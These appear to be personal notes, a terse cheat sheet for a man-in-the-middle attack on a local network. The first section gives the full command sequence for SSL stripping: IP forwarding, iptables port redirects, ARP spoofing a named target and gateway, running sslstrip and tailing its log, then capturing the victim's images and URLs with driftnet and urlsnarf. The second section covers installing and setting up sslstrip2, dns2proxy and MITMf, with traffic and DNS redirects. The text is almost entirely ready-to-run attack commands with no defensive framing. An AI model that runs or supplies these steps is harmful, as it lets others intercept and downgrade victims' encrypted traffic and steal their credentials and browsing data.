
#############################
#  hack sslstrip
#############################

https://www.youtube.com/watch?v=OoiYJUHF8bo
https://www.youtube.com/watch?v=NjNRzJV8Rvo

1) echo 1 > /proc/sys/net/ipv4/ip_forward
2) iptables -P FORWARD ACCEPT
3) iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
   (No require) iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
4) arpspoof -i wlp3s0 -t 192.168.3.133 -r 192.168.3.1
   			 (target ip)      (gateway)
5) sslstrip -l 8080
6) tail -f sslstrip.log

7) Capture images
       driftnet -i wlp3s0
8) Capture request urls 
       urlsnarf -i wlp3s0


#############################
#  todo sslstrip2
#############################
https://www.youtube.com/watch?v=9RPCSVcCv1w
https://github.com/byt3bl33d3r/MITMf/wiki/Installation
============
// download 
https://github.com/LeonardoNve/sslstrip2
https://github.com/LeonardoNve/dns2proxy
https://github.com/byt3bl33d3r/MITMf

//install
apt-get install python-pip
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive

// iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
